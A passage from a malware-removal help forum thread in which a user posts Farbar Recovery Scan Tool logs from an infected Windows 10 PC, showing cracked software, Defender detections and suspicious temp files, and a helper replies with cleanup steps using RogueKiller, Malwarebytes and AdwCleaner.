    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000180736 ____N (Microsoft Corporation) C:\Program Files (x86)\OKseaoP.exe
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ () C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ () C:\Users\Thomazing!\AppData\Local\installer.dat
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ () C:\Users\Thomazing!\AppData\Local\wbem.ini

    Some files in TEMP:
    ====================
    2019-02-08 21:46 - 2019-02-08 21:46 - 001527488 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\dbghelp.dll
    2019-02-08 21:44 - 2019-02-08 21:47 - 025260414 _____ (TigerTrade ) C:\Users\Thomazing!\AppData\Local\Temp\ezdyyd.exe
    2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
    2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
    2019-02-08 22:22 - 2019-02-09 08:52 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
    2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
    2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\dllhost.exe => File is digitally signed
    C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

    LastRegBack: 2019-02-09 13:15

    ==================== End of FRST.txt ============================

  11. #11
    Join Date
    Jul 2008
    Posts
    232
    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 8.02.2019
    Ran by Thomazing! (10-02-2019 15:26:00)
    Running from C:\Users\Thomazing!\Downloads
    Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
    Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
    Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
    AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    猥orrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    猥orrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    猥orrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
    CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
    Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
    Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
    Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
    IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
    Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
    Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
    RogueKiller version 13.1.4.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 13.1.4.0 - Adlice Software)
    Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
    VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
    WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
    ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
    Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
    Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
    Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


    ==================== Shortcuts & WMI ========================

    (The entries could be listed to be restored or removed.)


    ==================== Loaded Modules (Whitelisted) ==============

    2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
    2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

    127.0.0.1 space1.adminpressure.space
    127.0.0.1 trackpressure.website
    127.0.0.1 htagzdownload.pw
    127.0.0.1 texttotalk.org
    127.0.0.1 360devtraking.website
    127.0.0.1 room1.360dev.info
    127.0.0.1 djapp.info
    127.0.0.1 technologievimy.com

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\Control Panel\Desktop\\Wallpaper ->
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\Control Panel\Desktop\\Wallpaper ->
    DNS Servers: 192.168.1.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    If an entry is included in the fixlist, it will be removed.

    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\StartupApproved\Run: => "IDMan"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\StartupApproved\Run: => "IDMan"
    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\StartupApproved\Run: => "IDMan"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
    FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{1EA56DA0-0D98-40D4-9415-02849C00A304}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{12C02EC4-E8CB-4E17-9AE1-270A47450D88}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{38643855-9433-404F-AB1A-5BA1486C3091}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{06C0CE62-896B-4B0A-8B9C-E0E60278B93A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{1FDF2492-B639-4E70-BF09-CD0BA8C38671}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{58AFFE55-6861-4937-A48E-10153B97E5A0}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{ED6ABB3C-84FE-452A-AAB0-92ADAB765B5A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{7DA9684C-3EDF-473F-BE47-0ADBD2E127DC}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{E43D8A77-66E2-47FF-AB3B-01927D6F878D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

    ==================== Restore Points =========================

    ATTENTION: System Restore is disabled

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/09/2019 10:34:47 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 08:39:51 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 08:37:22 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 07:29:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 07:03:34 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: cloudnet.exe, version: 7.2.1.1, time stamp: 0x5c5df16a
    Faulting module name: KERNELBASE.dll, version: 10.0.10240.16384, time stamp: 0x559f3b2a
    Exception code: 0xc0000005
    Fault offset: 0x000ffc62
    Faulting process id: 0x2648
    Faulting application start time: 0x01d4c002846509ab
    Faulting application path: C:\Users\Thomazing!\AppData\Local\Temp\csrss\cloudnet.exe
    Faulting module path: C:\Windows\SYSTEM32\KERNELBASE.dll
    Report Id: 005d774b-7636-4cd7-a6d7-93e91613f789
    Faulting package full name:
    Faulting package-relative application ID:

    Error: (02/09/2019 01:24:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 01:22:58 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
    Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\


    System errors:
    =============
    Error: (02/09/2019 03:59:54 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 01:05:01 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
    Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

    Error: (02/09/2019 01:04:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:46:24 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
    Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

    Error: (02/09/2019 12:46:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:46:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
    Description: The Office Software Protection Platform service terminated unexpectedly. It has done this 1 time(s).

    Error: (02/09/2019 12:22:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session2 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:20:40 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
    Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.


    Windows Defender:
    ===================================
    Date: 2019-02-08 22:58:52.037
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:28:36.285
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:22:31.668
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:08:55.987
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:00:18.323
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: Real-Time Protection
    Process Name: C:\Program Files\WinRAR\WinRAR.exe
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    ==================== Memory info ===========================

    Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
    Percentage of memory in use: 23%
    Total physical RAM: 8059.98 MB
    Available physical RAM: 6126.46 MB
    Total Virtual: 9979.98 MB
    Available Virtual: 7991.81 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:97.66 GB) (Free:79.17 GB) NTFS
    Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS

    \\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)

    ==================== End of Addition.txt ============================

  12. #12
    Join Date
    Jul 2008
    Posts
    232
    MWB still busy blocking the malwares even after the scan.. ampf!

  13. #13
    Join Date
    Dec 2007
    Location
    Daly City, CA
    Posts
    22,377
    Avast is fine and it's free.

    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Double click on downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Remove Selected.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.

    Please download Malwarebytes to your desktop.
    • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
    • Then click Finish.
    • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
    • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
    • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
    • Restart your computer when prompted to do so.
    • The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.

    Please download AdwCleaner by Xplode and save to your Desktop.
    • Double click on AdwCleaner.exe to run the tool.
      Vista/Windows 7/8/10 users right-click and select Run As Administrator
    • The tool will start to update the database if one is required.
    • Click on the Scan button.
    • AdwCleaner will begin...be patient as the scan may take some time to complete.
    • After the scan has finished, click on the Logfile button.
    • A window will open which lists the logs of your scans.
    • Click on the Scan tab.
    • Double-click the most recent scan which will be at the top of the list....the log will appear.
    • Review the results...see note below
    • After reviewing the log, click on the Clean button.
    • Press OK when asked to close all programs and follow the onscreen prompts.
